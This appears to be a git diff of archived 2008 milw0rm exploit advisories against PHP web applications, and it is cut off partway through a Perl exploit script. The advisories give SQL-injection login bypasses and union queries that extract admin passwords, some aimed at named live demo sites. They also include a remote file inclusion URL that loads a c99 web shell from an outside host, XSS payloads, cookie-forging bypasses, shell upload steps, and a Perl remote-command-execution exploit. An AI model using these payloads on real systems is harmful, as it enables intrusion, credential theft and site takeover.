-username: admin ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Roomate Finder Solution Auth Bypass
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
+[~]
+[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design" ( aha size dork :( ( )
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin
+
+
+exploit for demo:
+
+login: http://www.realtysoft.pro/roommate/demo/admin/index.php
+
+username: admin ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7202.txt b/platforms/php/webapps/7202.txt
index d5b0ffca3..65dabe114 100755
--- a/platforms/php/webapps/7202.txt
+++ b/platforms/php/webapps/7202.txt
@@ -1,30 +1,30 @@
-[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
-[~]
-[~]----------------------------------------------------------
-[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
-[~]
-[~] Date: 23.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
-[~] -----------------------------------------------------------
-
-exploit for demo: ( you must login to site after you test this links. you look left for two link)
-
-http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
-
-http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-23]
+[~] PG Job Site homepage.php (poll_view_id) Blind Sql inj.
+[~]
+[~]----------------------------------------------------------
+[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
+[~]
+[~] Date: 23.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] Kucuk Bir Rica: Lutfen Demolarý Hacklemeyin ( pls dont make hack demos )
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz ( bIktIm )
+[~] -----------------------------------------------------------
+
+exploit for demo: ( you must login to site after you test this links. you look left for two link)
+
+http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
+
+http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7204.txt b/platforms/php/webapps/7204.txt
index 528dd6efd..88498848b 100755
--- a/platforms/php/webapps/7204.txt
+++ b/platforms/php/webapps/7204.txt
@@ -1,64 +1,64 @@
-########################################################################
-#
-# :: The Codes Like A Game Anyone Can Play With It,s ::
-#
-# Title: MODx CMS <= 0.9.6.2 Multiple Remote Vulne ( RFI + XSS)
-#
-# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
-#
-# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
-#
-# My Email : rxh0@hotmail.com [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ]
-#
-# Impact: High
-#
-# Fix: Contact With Me ;)
-#
-# Site: WwW.Sec-Code.CoM
-#
-# My Group : Security - Codes TeaM
-#
-########################################################################
-
-####################
-- Vulne [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
-####################
-
-
-require($reflect_base."configs/default.config.php");
-
-require($reflect_base."default.templates.php");
-
-
-####################
-- Exploit [RFI]:
-####################
-
-http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?
-
-
-####################
-- Exploit [XSS] In File index.php In Main Path:
-####################
-
-http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1
-
-By POST Method Posted That,s In username Box (Variable)
-
-"+onmouseover=alert(400942638703)+
-
-####################
-- Solution:
-####################
-
-Declear & Filter All This Fucking Functions
-
-####################
-- GreTzZ :
-####################
-
-No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )
-
-####################
-
-# milw0rm.com [2008-11-23]
+########################################################################
+#
+# :: The Codes Like A Game Anyone Can Play With It,s ::
+#
+# Title: MODx CMS <= 0.9.6.2 Multiple Remote Vulne ( RFI + XSS)
+#
+# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
+#
+# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
+#
+# My Email : rxh0@hotmail.com [ Please Before Added Me , Be Sure I Don,t Give You Anythings :) ]
+#
+# Impact: High
+#
+# Fix: Contact With Me ;)
+#
+# Site: WwW.Sec-Code.CoM
+#
+# My Group : Security - Codes TeaM
+#
+########################################################################
+
+####################
+- Vulne [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
+####################
+
+
+require($reflect_base."configs/default.config.php");
+
+require($reflect_base."default.templates.php");
+
+
+####################
+- Exploit [RFI]:
+####################
+
+http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?
+
+
+####################
+- Exploit [XSS] In File index.php In Main Path:
+####################
+
+http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1
+
+By POST Method Posted That,s In username Box (Variable)
+
+"+onmouseover=alert(400942638703)+
+
+####################
+- Solution:
+####################
+
+Declear & Filter All This Fucking Functions
+
+####################
+- GreTzZ :
+####################
+
+No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )
+
+####################
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7205.txt b/platforms/php/webapps/7205.txt
index b2f3e221f..10db7c62a 100755
--- a/platforms/php/webapps/7205.txt
+++ b/platforms/php/webapps/7205.txt
@@ -1,21 +1,21 @@
-#######################################################
-# Author : BeyazKurt
-# Contact : BeyazKurt@BSDMail.Com
-# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
-#
-# Script : Goople Cms (1.7)
-# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
-#
-# Exploit :
-# Open : http://SITE/win/upload.php
-# javascript:document.cookie = "loggedin=1; path=/";
-# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
-# File : http://SITE/user/doc/FILE (or your select)
-# -------------------------------
-# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
-# Rinia ShqiptaRe :)
-# Proud 2 Be MUSLIM !
-# Proud 2 Be ALBANIAN !
-#######################################################
-
-# milw0rm.com [2008-11-23]
+#######################################################
+# Author : BeyazKurt
+# Contact : BeyazKurt@BSDMail.Com
+# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
+#
+# Script : Goople Cms (1.7)
+# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
+#
+# Exploit :
+# Open : http://SITE/win/upload.php
+# javascript:document.cookie = "loggedin=1; path=/";
+# Copy/paste and go and back and upload PHP/HTML etc.. file. (and ingilizceme sokiyim :D )
+# File : http://SITE/user/doc/FILE (or your select)
+# -------------------------------
+# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+# Rinia ShqiptaRe :)
+# Proud 2 Be MUSLIM !
+# Proud 2 Be ALBANIAN !
+#######################################################
+
+# milw0rm.com [2008-11-23]
diff --git a/platforms/php/webapps/7206.txt b/platforms/php/webapps/7206.txt
index 81564fe6a..97845e5b4 100755
--- a/platforms/php/webapps/7206.txt
+++ b/platforms/php/webapps/7206.txt
@@ -1,58 +1,57 @@ - - || || | || - o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, - ( : / (_) / ( . -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -| | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - -<<!>> Found by : Cyb3r-1sT - -<<!>> C0ntact : cyb3r-1st [at] hotmail.com - -<<!>> Groups : InjEctOr5 T3am - -<<!>> site : www.tryag.cc/cc ....... www.hackteach.org/cc - -======================================================= -+++++++++++++++++++ Script information+++++++++++++++++ -======================================================= - - -<<->> script : PHP Classifieds Script - -<<->> download : www.phpclassifiedsscript.com - - -======================================================= -+++++++++++++++++++++++ Exploit +++++++++++++++++++++++ -======================================================= - - -<<->> D0rk : find it - -<<->> Exploit :>>> - - Step 1 :> http://www.site.me/path/admin/backup/datadump.sql - - Step 2 :> read that sql file and search for admin name & pass from "admin" table. - - Step 3 :> login in admin panel http://www.site.me/path/admin - -======================================================= -++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ -======================================================= - -<<->> All freinds , all muslims , hcj ( www.hcjlife.com ), str0ke - -# milw0rm.com [2008-11-23] + || || | || + o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, + ( : / (_) / ( . 
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +| | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + +<<!>> Found by : Cyb3r-1sT + +<<!>> C0ntact : cyb3r-1st [at] hotmail.com + +<<!>> Groups : InjEctOr5 T3am + +<<!>> site : www.tryag.cc/cc ....... www.hackteach.org/cc + +======================================================= ++++++++++++++++++++ Script information+++++++++++++++++ +======================================================= + + +<<->> script : PHP Classifieds Script + +<<->> download : www.phpclassifiedsscript.com + + +======================================================= ++++++++++++++++++++++++ Exploit +++++++++++++++++++++++ +======================================================= + + +<<->> D0rk : find it + +<<->> Exploit :>>> + + Step 1 :> http://www.site.me/path/admin/backup/datadump.sql + + Step 2 :> read that sql file and search for admin name & pass from "admin" table. + + Step 3 :> login in admin panel http://www.site.me/path/admin + +======================================================= +++++++++++++++++++++++ Greetz +++++++++++++++++++++++++ +======================================================= + +<<->> All freinds , all muslims , hcj ( www.hcjlife.com ), str0ke + +# milw0rm.com [2008-11-23] diff --git a/platforms/php/webapps/7208.txt b/platforms/php/webapps/7208.txt index 987435335..6b88c6df4 100755 --- a/platforms/php/webapps/7208.txt +++ b/platforms/php/webapps/7208.txt 
@@ -1,44 +1,44 @@ -Real Estate Portal v1.2 (ad_id) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc - -Mail : darkangel_G85@yahoo.com - -___________________________________ - -script : http://www.netartmedia.net/realestate/ - -DorK : "Powered by Real Estate Portal" - -exploit : -_______ - -http://www.site.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users-- - - - -Demo : -_______ - -http://hotelsaustriadirect.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users-- - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - - - IM IraQi | IM TrYaGI - -# milw0rm.com [2008-11-24] +Real Estate Portal v1.2 (ad_id) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home :IQ-SecuriTY > www.IQ-TY.com | TrYaG > www.TrYaG.cc + +Mail : darkangel_G85@yahoo.com + +___________________________________ + +script : http://www.netartmedia.net/realestate/ + +DorK : "Powered by Real Estate Portal" + +exploit : +_______ + +http://www.site.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users-- + + + +Demo : +_______ + 
+http://hotelsaustriadirect.com/index.php?mod=re_send_email&ad_id=-7+union+select+concat(username,0x3e,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+websiteadmin_admin_users-- + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + + + IM IraQi | IM TrYaGI + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7210.txt b/platforms/php/webapps/7210.txt index 2f22b2793..f4e1a509e 100755 --- a/platforms/php/webapps/7210.txt +++ b/platforms/php/webapps/7210.txt 
@@ -1,28 +1,28 @@ --============================================- -Autore: x0r - Evolution Team -Msn: andry2000@hotmail.it -Cms: Goople Cms 1.7 -Bug: Arbitrary File Creation -Download: -http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar --============================================- - -Exploit: - -#Attack One - -Logg yourself like a normal user then in your meno go on "Notepad" ( -/win/notepad/index.php ), in this notepad you can make a php shell :P - -#Attack Two - -Use this js code for bypass the log in: javascript:document.cookie = -"loggedin=1; path=/"; <--- tnx BeyazKurt - -And then go to /win/notepad/index.php - - -Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M.... -Bimba Mia Sei La Mia Vita... - -# milw0rm.com [2008-11-24] +-============================================- +Autore: x0r - Evolution Team +Msn: andry2000@hotmail.it +Cms: Goople Cms 1.7 +Bug: Arbitrary File Creation +Download: +http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar +-============================================- + +Exploit: + +#Attack One + +Logg yourself like a normal user then in your meno go on "Notepad" ( +/win/notepad/index.php ), in this notepad you can make a php shell :P + +#Attack Two + +Use this js code for bypass the log in: javascript:document.cookie = +"loggedin=1; path=/"; <--- tnx BeyazKurt + +And then go to /win/notepad/index.php + + +Greetz: Amore mio oggi sono 48 giorni...Ti AmO Da Impazzire... A + M.... +Bimba Mia Sei La Mia Vita... + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7214.txt b/platforms/php/webapps/7214.txt index 6cf988222..bbb935e26 100755 --- a/platforms/php/webapps/7214.txt +++ b/platforms/php/webapps/7214.txt 
@@ -1,31 +1,31 @@ -------------------------------------------------------------------------- - -- JIKO FroM No-exploit.Com --- -------------------------------------------------------------------------- -# Author : jiko -# email : jalikom@hotmail.com -# Home : www.no-exploit.Com -# Script : FTPZIK ->>http://www.bladi.13.fr/dm-up/ftpzik.zip - -=========================JIkI Team=================== -# Exploit : - http://no-exploit.com - [name of file iwthout php] - http://no-exploit.com/[script]/?p=cat&c=../ - http://no-exploit.com/[script]/?p=cat&c=<br>jiko <script>alert(11)</script> - http://no-exploit.com/[script]/inc/cat.php?c=<br>jiko <script>alert(11)</script> - http://no-exploit.com/[script]/inc/content.php?p=[file] - http://no-exploit.com/[script]/?p=[file] - -=========================JIKI Team=================== - greetz : all my friend and all No-exploit members and - $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR - all muslims - visit: ==> www.no-exploit.Com - Visit: My-montada.Co.cc For your free Forum -------------------------------------------------------------------------- - -- JIKI Team [ JIKO + KIl1er ] -- -------------------------------------------------------------------------- -------== troops of Mohamed comming inchalah =----------------- -Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc - -# milw0rm.com [2008-11-24] +------------------------------------------------------------------------- + -- JIKO FroM No-exploit.Com --- +------------------------------------------------------------------------- +# Author : jiko +# email : jalikom@hotmail.com +# Home : www.no-exploit.Com +# Script : FTPZIK ->>http://www.bladi.13.fr/dm-up/ftpzik.zip + +=========================JIkI Team=================== +# Exploit : + http://no-exploit.com + [name of file iwthout php] + http://no-exploit.com/[script]/?p=cat&c=../ + http://no-exploit.com/[script]/?p=cat&c=<br>jiko <script>alert(11)</script> + 
http://no-exploit.com/[script]/inc/cat.php?c=<br>jiko <script>alert(11)</script> + http://no-exploit.com/[script]/inc/content.php?p=[file] + http://no-exploit.com/[script]/?p=[file] + +=========================JIKI Team=================== + greetz : all my friend and all No-exploit members and + $ Gold_M $ Cochlain $ Hassin X $ cyber-zone $ r00t c0d3r $ HiSoKa $ MizoZ $ The-PunisheR + all muslims + visit: ==> www.no-exploit.Com + Visit: My-montada.Co.cc For your free Forum +------------------------------------------------------------------------- + -- JIKI Team [ JIKO + KIl1er ] -- +------------------------------------------------------------------------- +------== troops of Mohamed comming inchalah =----------------- +Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7215.txt b/platforms/php/webapps/7215.txt index 8da7d330a..0276319d8 100755 --- a/platforms/php/webapps/7215.txt +++ b/platforms/php/webapps/7215.txt 
@@ -1,53 +1,53 @@ -[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln. -[~] -[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com -[~] -[~] Date: 24.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos ) -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) ) -[~] -[~] N0T: RedHaK Kardesime ozel tesekurler. -[~] ----------------------------------------------------------- - -exploit: - -http://localhost/script/lyrics.php?section=full&id=[SQL] - -http://localhost/script/info.php?section=[XSS] - -[SQL] - -99999999+union+select+1,name,3,pass,5+from+admin-- - - -example: - -http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin-- - -login: - -http://www.caro-kunde.de/login.php - - -XSS: - -http://www.caro-kunde.de/info.php?section="><script>alert()</script> - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & RedHaK -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-24] +[~] Bandwebsite Version 1.5 Sql & XSS Multiple Remote Vuln. +[~] +[~] download: http://membres.lycos.fr/fluxx/bandwebsite.php +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com +[~] +[~] Date: 24.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] Kucuk Bir Rica: Lutfen DemolarI Hacklemeyin ( pls dont make hack demos ) +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: OGRETMENLER GUNUMUZ KUTLU OLSUN : ) ) +[~] +[~] N0T: RedHaK Kardesime ozel tesekurler. 
+[~] ----------------------------------------------------------- + +exploit: + +http://localhost/script/lyrics.php?section=full&id=[SQL] + +http://localhost/script/info.php?section=[XSS] + +[SQL] + +99999999+union+select+1,name,3,pass,5+from+admin-- + + +example: + +http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin-- + +login: + +http://www.caro-kunde.de/login.php + + +XSS: + +http://www.caro-kunde.de/info.php?section="><script>alert()</script> + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & RedHaK +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7216.txt b/platforms/php/webapps/7216.txt index 4fdd1f098..ea3a825ba 100755 --- a/platforms/php/webapps/7216.txt +++ b/platforms/php/webapps/7216.txt 
@@ -1,112 +1,112 @@ -Application: WebStudio CMS - - - -Vendor Name: BDigital Media Ltd - - - -Vendors Url: http://www.bdigital.biz - - - -Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability - - - -Exploitation: Remote - - - -Severity: Critical - - - -Solution Status: Unpatched - - - -Introduction: WebStudio CMS is a modular Web Content Management System -solution. - - - -Google Dork: "Powered by WebStudio" - - - - - -Description: - - - -WebStudio CMS is prone to an SQL-injection vulnerability because it fails to -sufficiently sanitize user-supplied data before using it in an SQL query. - -Exploiting this issue could allow an attacker to compromise the application, -access or modify data, or exploit latent vulnerabilities in the underlying -database. - - - -PoC: - - - -http://localhost/index.php?pageid=1+and+1=1 ( TRUE ) - - - -http://localhost/index.php?pageid=1+and+1=2 ( FALSE ) - - - -Exploit: - - - -http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE ) - - - -http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE ) - - - -http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE ) - - - -Solution: - - - -There was no vendor-supplied solution at the time of entry. - - - -Edit source code manually to ensure user-supplied input is correctly -sanitised. - - - - - -Credits: - - - -Charalambous Glafkos - -Email: glafkos (at) astalavista (dot) com - -___________________________________________ - -ASTALAVISTA - the hacking & security community - -www.astalavista.com - -www.astalavista.net - -# milw0rm.com [2008-11-24] +Application: WebStudio CMS + + + +Vendor Name: BDigital Media Ltd + + + +Vendors Url: http://www.bdigital.biz + + + +Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability + + + +Exploitation: Remote + + + +Severity: Critical + + + +Solution Status: Unpatched + + + +Introduction: WebStudio CMS is a modular Web Content Management System +solution. 
+ + + +Google Dork: "Powered by WebStudio" + + + + + +Description: + + + +WebStudio CMS is prone to an SQL-injection vulnerability because it fails to +sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, +access or modify data, or exploit latent vulnerabilities in the underlying +database. + + + +PoC: + + + +http://localhost/index.php?pageid=1+and+1=1 ( TRUE ) + + + +http://localhost/index.php?pageid=1+and+1=2 ( FALSE ) + + + +Exploit: + + + +http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE ) + + + +http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE ) + + + +http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE ) + + + +Solution: + + + +There was no vendor-supplied solution at the time of entry. + + + +Edit source code manually to ensure user-supplied input is correctly +sanitised. + + + + + +Credits: + + + +Charalambous Glafkos + +Email: glafkos (at) astalavista (dot) com + +___________________________________________ + +ASTALAVISTA - the hacking & security community + +www.astalavista.com + +www.astalavista.net + +# milw0rm.com [2008-11-24] diff --git a/platforms/php/webapps/7217.pl b/platforms/php/webapps/7217.pl index d30db833d..18c316386 100755 --- a/platforms/php/webapps/7217.pl +++ b/platforms/php/webapps/7217.pl 
@@ -1,258 +1,258 @@ -# Author: __GiReX__ -# Homepage: girex.altervista.org - -# Date: 24/11/2008 - -# CMS: Quicksilver Forums <= 1.4.2 -# Site: http://www.quicksilverforums.com/ - -# Bug: Local File Inclusion -# Exploit: Remote Command Execution - -# Note: Works with windows servers only - Works regardless php.ini settings - -# Bug Discussion: - -# file: global.php -# lines: 318-329 - - function get_lang($lang, $a = null, $path = './', $main = true) - { - if (isset($this->get['lang'])) { - $lang = $this->get['lang']; - - } - - if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) { - $lang = 'en'; - } - - include $path . 'languages/' . $lang . '.php'; - -# As you can see, Quicksilver filter can be easily bypassed in windows servers -# couse use of backslashes "\" in filesystem's paths. - -# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting - -# We can upload a malicious avatar and include it to have a RCE - - -#!/usr/bin/perl -# Quicksilver Forums <= 1.4.2 RCE Exploit (win only) -# Local File Inclusion / Malicious Avatar Upload -# Coded by __GiReX__ - -use IO::Socket::INET; -use MIME::Base64; - -if(@ARGV < 3) -{ - banner(); - print "[+] You need an user account to run this exploit\n\n"; - print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n"; - print "[+] Example: perl $0 localhost /quick/ test password\n"; - exit; -} - -my ($host, $path, $user, $pass) = @ARGV; - -$host =~ s/^http:\/\///; -$host =~ s/^www\.//; -$target = "http://${host}${path}"; - -banner(); -check_vuln(); - -$cookie = do_login() or debug($debug, 1); -upload_avatar() or debug($debug, 2); - -while(1) -{ - print "[+] shell\@quick:\$ "; - chomp(my $cmd = <STDIN>); - - exit if $cmd eq 'exit'; - create_socket(); - - print $sd "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n". - "Host: $host\r\n". - "Cookie: $cookie\r\n". - "CMD: ". encode_base64($cmd)."\r\n". 
- "Connection: keep-alive\r\n\r\n"; - - $out .= $_ while <$sd>; - - if($out =~ /-code-/) - { - $_out = substr($out, index($out, '-code-') + 6); $n = index($_out, '-code'); - $__out = substr($_out, 0, $n); - } - else - { - debug($out, 3); - } - - close($sd); - $out = undef; - - print STDOUT "\n". $__out."\n"; -} - -sub check_vuln -{ - create_socket(); - - print $sd "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n". - "Host: $host\r\n". - "Connection: keep-alive\r\n\r\n"; - - while(my $res = <$sd>) - { - $ok = 1 if $res =~ /404 Not Found/; - - if($res =~ /<b>Fatal error<\/b>/) - { - close($sd); - return 1; - } - - our $debug .= $res; - } - - print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit - if not defined $ok; - - debug($debug, 0); -} - - -sub do_login -{ - create_socket(); - my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia"; - - print $sd "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" . - "Host: $host\r\n" . - "Connection: keep-alive\r\n" . - "Content-Type: application/x-www-form-urlencoded\r\n" . - "Content-Length: ". length($data)."\r\n\r\n" . - $data . "\r\n\r\n"; - - - - while(my $res = <$sd>) - { - if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/) - { - $prefix = $1 unless $prefix; - $user_id = $2 unless $user_id; - } - elsif($res =~ /Set-Cookie: 